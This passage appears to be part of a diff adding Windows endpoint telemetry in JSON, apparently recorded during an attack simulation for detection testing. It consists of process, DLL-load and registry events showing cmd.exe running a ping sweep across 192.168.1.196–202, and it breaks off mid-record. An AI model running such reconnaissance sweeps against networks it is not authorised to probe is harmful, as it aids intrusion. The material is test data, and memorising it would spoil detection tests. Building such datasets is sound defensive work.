"{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "process", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572946990000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.196", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572947130000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947290000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572949490000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572949490000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572949490000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572951990000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.197", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5012, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "process", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572956830000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.198", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572956990000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "process", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572961990000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.199", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7916, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "process", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572966990000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.200", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "process", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572971830000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.201", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2768, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "process", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572976990000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.202", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6828, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572977130000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": 